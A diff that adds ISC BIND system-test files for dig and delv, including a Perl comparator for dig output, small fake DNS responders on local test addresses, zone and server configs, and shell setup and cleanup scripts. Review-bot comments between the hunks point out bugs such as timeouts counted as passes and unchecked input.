+do + $DIG $DIGOPTS example. @10.53.0.3 soa > dig.out.ns3.test || ret=1 + if grep SERVFAIL dig.out.ns3.test > /dev/null + then + try=`expr $try + 1` + sleep 1 + else + digcomp dig.out.ns1.test dig.out.ns3.test || ret=1 + break; + fi +done +echo_i "try $try" +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/digcomp.pl b/bin/tests/system/digcomp.pl new file mode 100644 index 0000000..8024dea --- /dev/null +++ b/bin/tests/system/digcomp.pl 
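Review bot: Both polling loops treat a timeout as success: when every one of the 120 attempts returns SERVFAIL the loop simply ends with `ret` still 0, so the test passes without the zone ever having transferred. Adding `[ $try -lt 120 ] || ret=1` after each `done` closes that gap. The first `dig` against 10.53.0.1 also runs before `ret=0`, so its `|| ret=1` is overwritten two lines later; moving `ret=0` above that command keeps the failure.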
@@ -0,0 +1,164 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Compare two files, each with the output from dig, for differences. +# Ignore "unimportant" differences, like ordering of NS lines, TTL's, +# etc... + +$lc = 0; +if ($ARGV[0] eq "--lc") { + $lc = 1; + shift; +} +$file1 = $ARGV[0]; +$file2 = $ARGV[1]; + +$count = 0; +$firstname = ""; +$status = 0; +$rcode1 = "none"; +$rcode2 = "none"; + +open(FILE1, $file1) || die("open: $file1: $!\n"); +while (<FILE1>) { + ~ s/\r\n//g; + ~ s/\n//g; + if (/^;.+status:\s+(\S+).+$/) { + $rcode1 = $1; + } + next if (/^;/); + if (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s+(.+)$/) { + $name = $1; + $class = $2; + $type = $3; + $value = $4; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if ($type eq "SOA") { + $firstname = $name if ($firstname eq ""); + if ($name eq $firstname) { + $name = "$name$count"; + $count++; + } + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $line = $entry{"$name ; $class.$type ; $value"}; + print("Duplicate entry in $file1:\n> $_\n< $line\n"); + } else { + $entry{"$name ; $class.$type ; $value"} = $_; + } + } elsif (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s*$/) { + $name = $1; + $class = $2; + $type = $3; + $value = ""; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if ($type eq "SOA") { + $firstname = $name if ($firstname eq ""); + if ($name eq $firstname) { + $name = "$name$count"; + $count++; + } + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $line = $entry{"$name ; $class.$type ; $value"}; + print("Duplicate entry in $file1:\n> $_\n< $line\n"); + } else { + 
$entry{"$name ; $class.$type ; $value"} = $_; + } + } +} +close(FILE1); + +$printed = 0; + +open(FILE2, $file2) || die("open: $file2: $!\n"); +while (<FILE2>) { + ~ s/\r\n//g; + ~ s/\n//g; + if (/^;.+status:\s+(\S+).+$/) { + $rcode2 = $1; + } + next if (/^;/); + if (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s+(.+)$/) { + $name = $1; + $class = $2; + $type = $3; + $value = $4; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if (($name eq $firstname) && ($type eq "SOA")) { + $count--; + $name = "$name$count"; + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $entry{"$name ; $class.$type ; $value"} = ""; + } else { + print("Only in $file2 (missing from $file1):\n") + if ($printed == 0); + print("> $_\n"); + $printed++; + $status = 1; + } + } elsif (/^(\S+)\s+\S+\s+(\S+)\s+(\S+)\s*$/) { + $name = $1; + $class = $2; + $type = $3; + $value = ""; + if ($lc) { + $name = lc($name); + $value = lc($value); + } + if (($name eq $firstname) && ($type eq "SOA")) { + $count--; + $name = "$name$count"; + } + if ($entry{"$name ; $class.$type ; $value"} ne "") { + $entry{"$name ; $class.$type ; $value"} = ""; + } else { + print("Only in $file2 (missing from $file1):\n") + if ($printed == 0); + print("> $_\n"); + $printed++; + $status = 1; + } + } +} +close(FILE2); + +$printed = 0; + +foreach $key (keys(%entry)) { + if ($entry{$key} ne "") { + print("Only in $file1 (missing from $file2):\n") + if ($printed == 0); + print("< $entry{$key}\n"); + $status = 1; + $printed++; + } +} + +if ($rcode1 ne $rcode2) { + print("< status: $rcode1\n"); + print("> status: $rcode2\n"); + $status = 1; +} + +exit($status); diff --git a/bin/tests/system/digdelv/ans4/startme b/bin/tests/system/digdelv/ans4/startme new file mode 100644 index 0000000..8b13789 --- /dev/null +++ b/bin/tests/system/digdelv/ans4/startme @@ -0,0 +1 @@ + diff --git a/bin/tests/system/digdelv/ans5/ans.pl b/bin/tests/system/digdelv/ans5/ans.pl new file mode 100644 index 0000000..6396406 --- /dev/null 
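Review bot: Both input files are opened with the two-argument form, `open(FILE1, $file1)` and `open(FILE2, $file2)`, which lets Perl interpret mode characters in the file name (a leading `>` or a trailing `|`) instead of treating it as a plain path. The three-argument form removes that ambiguity: `open(FILE1, '<', $file1) || die("open: $file1: $!\n");`, and likewise for FILE2. The `~ s/\r\n//g;` and `~ s/\n//g;` lines work only because the `~` is applied to the substitution's return value and then discarded; a single `s/\r?\n//g;` does the same job without the stray operator.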
+++ b/bin/tests/system/digdelv/ans5/ans.pl 
@@ -0,0 +1,176 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# This is a TCP-only DNS server whose aim is to facilitate testing how dig +# copes with prematurely closed TCP connections. +# +# This server can be configured (through a separate control socket) with a +# series of responses to send for subsequent incoming TCP DNS queries. Only +# one query is handled before closing each connection. In order to keep things +# simple, the server is not equipped with any mechanism for handling malformed +# queries. +# +# Available response types are defined in the %response_types hash in the +# getAnswerSection() function below. Each RR returned is generated dynamically +# based on the QNAME found in the incoming query. 
+ +use IO::File; +use Net::DNS; +use Net::DNS::Packet; + +use strict; + +# Ignore SIGPIPE so we won't fail if peer closes a TCP socket early +local $SIG{PIPE} = 'IGNORE'; + +# Flush logged output after every line +local $| = 1; + +my $server_addr = "10.53.0.5"; +if (@ARGV > 0) { + $server_addr = @ARGV[0]; +} + +my $mainport = int($ENV{'PORT'}); +if (!$mainport) { $mainport = 5300; } +my $ctrlport = int($ENV{'EXTRAPORT1'}); +if (!$ctrlport) { $ctrlport = 5301; } + +my $ctlsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $ctrlport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $tcpsock = IO::Socket::INET->new(LocalAddr => "$server_addr", + LocalPort => $mainport, Proto => "tcp", Listen => 5, Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!";; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my @response_sequence = ("complete_axfr"); +my $connection_counter = 0; + +# Return the next answer type to send, incrementing the connection counter and +# making sure the latter does not exceed the size of the array holding the +# configured response sequence. +sub getNextResponseType { + my $response_type = $response_sequence[$connection_counter]; + + $connection_counter++; + $connection_counter %= scalar(@response_sequence); + + return $response_type; +} + +# Return an array of resource records comprising the answer section of a given +# response type. +sub getAnswerSection { + my ($response_type, $qname) = @_; + + my %response_types = ( + no_response => [], + + partial_axfr => [ + Net::DNS::RR->new("$qname 300 IN SOA . . 0 0 0 0 300"), + Net::DNS::RR->new("$qname NS ."), + ], + + complete_axfr => [ + Net::DNS::RR->new("$qname 300 IN SOA . . 0 0 0 0 300"), + Net::DNS::RR->new("$qname NS ."), + Net::DNS::RR->new("$qname 300 IN SOA . . 
0 0 0 0 300"), + ], + ); + + return $response_types{$response_type}; +} + + +# Generate a Net::DNS::Packet containing the response to send on the current +# TCP connection. If the answer section of the response is determined to be +# empty, no data will be sent on the connection at all (immediate EOF). +sub generateResponse { + my ($buf) = @_; + my $request; + + if ($Net::DNS::VERSION > 0.68) { + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($request, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + my @questions = $request->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + my $qclass = $questions[0]->qclass; + my $id = $request->header->id; + + my $packet = new Net::DNS::Packet($qname, $qtype, $qclass); + $packet->header->qr(1); + $packet->header->aa(1); + $packet->header->id($id); + + my $response_type = getNextResponseType(); + my $answers = getAnswerSection($response_type, $qname); + for my $rr (@$answers) { + $packet->push("answer", $rr); + } + + print " Sending \"$response_type\" response\n"; + + return $packet->data if @$answers; +} + +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($ctlsock), 1) = 1; + vec($rin, fileno($tcpsock), 1) = 1; + + select($rout = $rin, undef, undef, undef); + + if (vec($rout, fileno($ctlsock), 1)) { + my $conn = $ctlsock->accept; + @response_sequence = split(' ', $conn->getline); + $connection_counter = 0; + print "Response sequence set to: @response_sequence\n"; + $conn->close; + } elsif (vec($rout, fileno($tcpsock), 1)) { + my $buf; + my $lenbuf; + my $conn = $tcpsock->accept; + my $n = $conn->sysread($lenbuf, 2); + die unless $n == 2; + my $len = unpack("n", $lenbuf); + $n = $conn->sysread($buf, $len); + die unless $n == $len; + print "TCP request\n"; + my $response = generateResponse($buf); + if ($response) { + $len = length($response); + $n = $conn->syswrite(pack("n", $len), 2); + $n = $conn->syswrite($response, $len); 
+ print " Sent: $n chars via TCP\n"; + } else { + print " No response sent\n"; + } + $conn->close; + } +} diff --git a/bin/tests/system/digdelv/ans6/ans.pl b/bin/tests/system/digdelv/ans6/ans.pl new file mode 100755 index 0000000..39d02b2 --- /dev/null +++ b/bin/tests/system/digdelv/ans6/ans.pl 
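Review bot: The control-socket branch of the main loop assigns `split(' ', $conn->getline)` straight into `@response_sequence`, so a control connection that closes without sending a line (or sends only whitespace) leaves the array empty. The next call to getNextResponseType() then dies on `$connection_counter %= scalar(@response_sequence)` with a modulus of zero. Keeping the previous sequence when nothing usable arrives avoids that: `my $line = $conn->getline;` followed by `@response_sequence = split(' ', $line) if defined $line && $line =~ /\S/;`. Separately, `$server_addr = @ARGV[0];` is a one-element slice and should read `$ARGV[0]`.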
@@ -0,0 +1,84 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.6", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +for (;;) { + $sock->recv($buf, 512); + + print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n"; + + my $packet; + + if ($Net::DNS::VERSION > 0.68) { + $packet = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + } else { + my $err; + ($packet, $err) = new Net::DNS::Packet(\$buf, 0); + $err and die $err; + } + + print "REQUEST:\n"; + $packet->print; + + $packet->header->qr(1); + + my @questions = $packet->question; + my $qname = $questions[0]->qname; + my $qtype = $questions[0]->qtype; + + my $donotrespond = 0; + + $packet->header->aa(1); + if ($qtype eq "A") { + $packet->push("answer", + new Net::DNS::RR($qname . 
" 300 A 10.53.0.5")); + } else { + $donotrespond = 1; + } + + if ($donotrespond == 0) { + my $sendsock = + IO::Socket::INET->new(LocalAddr => "10.53.1.2", + PeerAddr => $sock->peerhost, + PeerPort => $sock->peerport, + Proto => "udp") or die "$!"; + print "**** response from ", $sendsock->sockhost, " to " , + $sendsock->peerhost, " port ", $sendsock->peerport, "\n"; + $sendsock->send($packet->data); + $sendsock->close; + print "RESPONSE:\n"; + $packet->print; + print "\n"; + } else { + print "DROP:\n"; + } +} diff --git a/bin/tests/system/digdelv/ans7/ans.pl b/bin/tests/system/digdelv/ans7/ans.pl new file mode 100755 index 0000000..a7aa60e --- /dev/null +++ b/bin/tests/system/digdelv/ans7/ans.pl 
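Review bot: The receive loop dereferences `$questions[0]->qname` without checking that the parsed packet carries a question, ignores the return value of `$sock->recv($buf, 512)`, and dies on any packet Net::DNS cannot decode, so one stray or truncated datagram on the port ends the responder for the rest of the test run. Skipping bad input keeps the fixture alive: `defined $sock->recv($buf, 512) or next;` and `my ($q) = $packet->question or next;`, with the decode failure logged and skipped rather than passed to `die`. The script also runs without `use strict` and never declares `$buf`; adding `use strict;` and `my $buf;` would match ans5/ans.pl. The same loop appears in the ans7/ans.pl hunk. A comment saying why the reply is sent from 10.53.1.2 rather than the address the query arrived on would also help, since that looks deliberate but is not explained.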
@@ -0,0 +1,68 @@
+#!/usr/bin/perl -w
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+use IO::File;
+use IO::Socket;
+use Net::DNS;
+use Net::DNS::Packet;
+
+my $localport = int($ENV{'PORT'});
+if (!$localport) { $localport = 5300; }
+
+my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.7",
+ LocalPort => $localport, Proto => "udp") or die "$!";
+
+my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!";
+print $pidf "$$\n" or die "cannot write pid file: $!";
+$pidf->close or die "cannot close pid file: $!";
+sub rmpid { unlink "ans.pid"; exit 1; };
+
+$SIG{INT} = \&rmpid;
+$SIG{TERM} = \&rmpid;
+
+STDOUT->autoflush(1);
+
+print "Net::DNS::VERSION => $Net::DNS::VERSION\n";
+
+for (;;) {
+ $sock->recv($buf, 512);
+
+ print "**** request from " , $sock->peerhost, " port ", $sock->peerport, "\n";
+
+ my $packet;
+
+ if ($Net::DNS::VERSION > 0.68) {
+ $packet = new Net::DNS::Packet(\$buf, 0);
+ $@ and die $@;
+ } else {
+ my $err;
+ ($packet, $err) = new Net::DNS::Packet(\$buf, 0);
+ $err and die $err;
+ }
+
+ print "REQUEST:\n";
+ $packet->print;
+
+ $packet->header->qr(1);
+ $packet->header->opcode(5);
+
+ my @questions = $packet->question;
+ my $qname = $questions[0]->qname;
+ my $qtype = $questions[0]->qtype;
+ $packet->push("update", rr_del("$qname SOA"));
+
+ print "RESPONSE:\n";
+ $packet->print;
+
+ $sock->send($packet->data);
+}
diff --git a/bin/tests/system/digdelv/clean.sh b/bin/tests/system/digdelv/clean.sh
new file mode 100644
index 0000000..ac84c3f
--- /dev/null
+++ b/bin/tests/system/digdelv/clean.sh
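Review bot: This responder has no header comment saying what it is for, while ans5/ans.pl documents its purpose at the top. From tests.sh in the same commit it exists to answer a QUERY with an UPDATE-opcode message so that dig, host, nslookup and nsupdate can be checked for rejecting the mismatch. I would add something like `# Answers every query with opcode UPDATE (5) so clients can be tested for rejecting a response whose opcode does not match the request.` above the `use` lines. `$qtype` is assigned but never used and can be dropped.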
@@ -0,0 +1,33 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+rm -f ./*/anchor.*
+rm -f ./*/named.conf
+rm -f ./*/named.memstats
+rm -f ./*/named.run
+rm -f ./delv.out.test*
+rm -f ./dig.out.*test*
+rm -f ./dig.out.mm.*
+rm -f ./dig.out.mn.*
+rm -f ./dig.out.nm.*
+rm -f ./dig.out.nn.*
+rm -f ./host.out.test*
+rm -f ./ns*/managed-keys.bind*
+rm -f ./ns*/named.lock
+rm -f ./ns2/dsset-example.
+rm -f ./ns2/example.db ./ns2/K* ./ns2/keyid ./ns2/keydata
+rm -f ./nslookup.out.test*
+rm -f ./yamlget.out.*
+rm -f ./nsupdate.out.test*
diff --git a/bin/tests/system/digdelv/ns1/named.conf.in b/bin/tests/system/digdelv/ns1/named.conf.in
new file mode 100644
index 0000000..df552bd
--- /dev/null
+++ b/bin/tests/system/digdelv/ns1/named.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS1
+
+options {
+ query-source address 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { fd92:7065:b8e:ffff::1; };
+ recursion no;
+ notify yes;
+ dnssec-validation no;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/digdelv/ns1/root.db b/bin/tests/system/digdelv/ns1/root.db
new file mode 100644
index 0000000..b43cc40
--- /dev/null
+++ b/bin/tests/system/digdelv/ns1/root.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+a.root-servers.nil. AAAA fd92:7065:b8e:ffff::1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+ns2.example. AAAA fd92:7065:b8e:ffff::2
diff --git a/bin/tests/system/digdelv/ns2/example.db.in b/bin/tests/system/digdelv/ns2/example.db.in
new file mode 100644
index 0000000..c711049
--- /dev/null
+++ b/bin/tests/system/digdelv/ns2/example.db.in
@@ -0,0 +1,51 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ NS ns3
+ns2 A 10.53.0.2
+ns2 AAAA fd92:7065:b8e:ffff::2
+ns3 A 10.53.0.3
+ns3 AAAA fd92:7065:b8e:ffff::3
+
+a A 10.0.0.1
+a AAAA fd92:7065:b8e:ffff::1
+b A 10.0.0.2
+b AAAA fd92:7065:b8e:ffff::2
+c A 10.0.0.3
+c AAAA fd92:7065:b8e:ffff::3
+d A 10.0.0.0
+d AAAA fd92:7065:b8e:ffff::
+
+xn--caf-dma A 10.1.2.3
+
+foo TXT "testing"
+foo A 10.0.1.0
+foo SSHFP 2 1 123456789abcdef67890123456789abcdef67890
+
+; TTL of 3 weeks
+weeks 1814400 A 10.53.0.2
+; TTL of 3 days
+days 259200 A 10.53.0.2
+; TTL of 3 hours
+hours 10800 A 10.53.0.2
+;TTL of 45 minutes
+minutes 2700 A 10.53.0.2
+;TTL of 45 seconds
+seconds 45 A 10.53.0.2
diff --git a/bin/tests/system/digdelv/ns2/named.conf.in b/bin/tests/system/digdelv/ns2/named.conf.in
new file mode 100644
index 0000000..1391b73
--- /dev/null
+++ b/bin/tests/system/digdelv/ns2/named.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/digdelv/ns2/sign.sh b/bin/tests/system/digdelv/ns2/sign.sh
new file mode 100644
index 0000000..41dacd6
--- /dev/null
+++ b/bin/tests/system/digdelv/ns2/sign.sh
@@ -0,0 +1,29 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+ksk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone example.)
+
+cp example.db.in example.db
+
+"$SIGNER" -Sz -f example.db -o example example.db.in > /dev/null 2>&1
+
+keyfile_to_key_id "$ksk" > keyid
+grep -Ev '^;' < "$ksk.key" | cut -f 7- -d ' ' > keydata
+
+keyfile_to_initial_keys "$ksk" > ../ns3/anchor.dnskey
+keyfile_to_initial_ds "$ksk" > ../ns3/anchor.ds
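Review bot: In the sign.sh hunk the signer call discards both stdout and stderr (`"$SIGNER" -Sz -f example.db -o example example.db.in > /dev/null 2>&1`) while the script runs under `set -e`, so a signing failure stops setup with no message saying why. Keeping stderr, e.g. `"$SIGNER" -Sz -f example.db -o example example.db.in > /dev/null`, leaves the diagnostic in the test log. The preceding `cp example.db.in example.db` looks redundant, since the signer is told to write example.db with `-f`; if the copy is needed, a one-line comment saying why would help.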
diff --git a/bin/tests/system/digdelv/ns3/named.conf.in b/bin/tests/system/digdelv/ns3/named.conf.in
new file mode 100644
index 0000000..a13747b
--- /dev/null
+++ b/bin/tests/system/digdelv/ns3/named.conf.in
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3 dscp 1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { fd92:7065:b8e:ffff::3; };
+ recursion yes;
+ dnssec-validation no;
+ server-id "ns3";
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/digdelv/prereq.sh b/bin/tests/system/digdelv/prereq.sh
new file mode 100644
index 0000000..8f5a385
--- /dev/null
+++ b/bin/tests/system/digdelv/prereq.sh
@@ -0,0 +1,25 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ :
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
diff --git a/bin/tests/system/digdelv/setup.sh b/bin/tests/system/digdelv/setup.sh
new file mode 100644
index 0000000..b259e1b
--- /dev/null
+++ b/bin/tests/system/digdelv/setup.sh
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+
+cd ns2 && $SHELL sign.sh
diff --git a/bin/tests/system/digdelv/tests.sh b/bin/tests/system/digdelv/tests.sh
new file mode 100644
index 0000000..470f230
--- /dev/null
+++ b/bin/tests/system/digdelv/tests.sh
@@ -0,0 +1,1347 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +status=0 +n=0 + +sendcmd() { + "$PERL" "$SYSTEMTESTTOP/send.pl" "${1}" "$EXTRAPORT1" +} + +dig_with_opts() { + "$DIG" -p "$PORT" "$@" +} + +mdig_with_opts() { + "$MDIG" -p "$PORT" "$@" +} + +# Check if response in file $1 has the correct TTL range. +# The response record must have RRtype $2 and class IN (CLASS1). +# Maximum TTL is given by $3. This works in most cases where TTL is +# the second word on the line. TTL position can be adjusted with +# setting the position $4, but that requires updating this function. +check_ttl_range() { + file=$1 + pos=$4 + + case "$pos" in + "3") + awk -v rrtype="$2" -v ttl="$3" '($4 == "IN" || $4 == "CLASS1" ) && $5 == rrtype { if ($3 <= ttl) { ok=1 } } END { exit(ok?0:1) }' < $file + ;; + *) + awk -v rrtype="$2" -v ttl="$3" '($3 == "IN" || $3 == "CLASS1" ) && $4 == rrtype { if ($2 <= ttl) { ok=1 } } END { exit(ok?0:1) }' < $file + ;; + esac + + result=$? + [ $result -eq 0 ] || echo_i "ttl check failed" + return $result +} + +# using delv insecure mode as not testing dnssec here +delv_with_opts() { + "$DELV" +noroot -p "$PORT" "$@" +} + +KEYID="$(cat ns2/keyid)" +KEYDATA="$(< ns2/keydata sed -e 's/+/[+]/g')" +NOSPLIT="$(< ns2/keydata sed -e 's/+/[+]/g' -e 's/ //g')" + +HAS_PYYAML=0 +if [ -n "$PYTHON" ] ; then + $PYTHON -c "import yaml" 2> /dev/null && HAS_PYYAML=1 +fi + +# +# test whether ans7/ans.pl will be able to send a UPDATE response. +# if it can't, we will log that below. 
